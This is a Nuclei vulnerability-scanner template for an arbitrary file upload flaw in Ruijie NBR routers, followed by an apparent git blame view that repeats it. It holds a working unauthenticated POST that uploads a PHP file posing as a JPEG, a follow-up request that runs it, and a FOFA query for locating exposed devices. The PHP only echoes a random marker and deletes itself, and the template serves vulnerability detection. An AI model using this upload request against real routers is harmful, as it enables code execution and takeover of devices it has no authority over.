nuclei-templates/http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml

id: ruijie-nbr-fileupload

info:
  name: Ruijie NBR fileupload.php - Arbitrary File Upload
  author: SleepingBag945
  severity: critical
  description: |
    Ruijie NBR router fileupload.php file has an arbitrary file upload vulnerability. An attacker can upload any file to the server through the vulnerability to obtain server permissions.
  reference:
    - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/ruijie-nbr-fileupload.yaml
  metadata:
    verified: true
    max-request: 2
    fofa-query: app="Ruijie-NBR路由器"
  tags: ruijie,file-upload,intrusive,nbr
variables:
  filename: "{{rand_base(6)}}"
  string: "{{rand_base(5)}}"

http:
  - raw:
      - |
        POST /ddi/server/fileupload.php?uploadDir=upload&name={{filename}}.php HTTP/1.1
        Host: {{Hostname}}
        Accept: text/plain, */*; q=0.01
        Content-Disposition: form-data; name="file"; filename="{{filename}}.php"
        Content-Type: image/jpeg

        <?php echo "{{string}}"; unlink(__FILE__); ?>
      - |
        GET /ddi/server/upload/{{filename}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code_1 == 200 && contains(body_1,"jsonrpc")
          - status_code_2 == 200 && contains(body_2,"{{string}}")
        condition: and

# digest: 4a0a0047304502205aec15506f551f025b3d99fd40a127b9e9c4787e16d32915d121b954cf089721022100d8fe6d2cbdf3db8ebc017eee812656570ec642c8ae99dea9b26c64c427570fee:922c64590222798bb761d5b6d8e72950
Completed Assigned templates - DhiyaneshDK 2023-09-05 12:25:45 +00:00			`id: ruijie-nbr-fileupload`
templateman update 2023-10-14 11:27:55 +00:00
Completed Assigned templates - DhiyaneshDK 2023-09-05 12:25:45 +00:00			`info:`
			`name: Ruijie NBR fileupload.php - Arbitrary File Upload`
			`author: SleepingBag945`
			`severity: critical`
			`description: \|`
			`Ruijie NBR router fileupload.php file has an arbitrary file upload vulnerability. An attacker can upload any file to the server through the vulnerability to obtain server permissions.`
			`reference:`
			`- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/ruijie-nbr-fileupload.yaml`
			`metadata:`
			`verified: true`
templateman update 2023-10-14 11:27:55 +00:00			`max-request: 2`
			`fofa-query: app="Ruijie-NBR路由器"`
Completed Assigned templates - DhiyaneshDK 2023-09-05 12:25:45 +00:00			`tags: ruijie,file-upload,intrusive,nbr`
			`variables:`
			`filename: "{{rand_base(6)}}"`
			`string: "{{rand_base(5)}}"`

			`http:`
			`- raw:`
			`- \|`
			`POST /ddi/server/fileupload.php?uploadDir=upload&name={{filename}}.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept: text/plain, /; q=0.01`
			`Content-Disposition: form-data; name="file"; filename="{{filename}}.php"`
			`Content-Type: image/jpeg`

			`<?php echo "{{string}}"; unlink(__FILE__); ?>`
			`- \|`
			`GET /ddi/server/upload/{{filename}}.php HTTP/1.1`
			`Host: {{Hostname}}`

			`matchers:`
			`- type: dsl`
			`dsl:`
			`- status_code_1 == 200 && contains(body_1,"jsonrpc")`
			`- status_code_2 == 200 && contains(body_2,"{{string}}")`
templateman update 2023-10-14 11:27:55 +00:00			`condition: and`
TemplateMan Update [Fri Oct 20 11:41:12 UTC 2023] :robot: 2023-10-20 11:41:13 +00:00
			`# digest: 4a0a0047304502205aec15506f551f025b3d99fd40a127b9e9c4787e16d32915d121b954cf089721022100d8fe6d2cbdf3db8ebc017eee812656570ec642c8ae99dea9b26c64c427570fee:922c64590222798bb761d5b6d8e72950`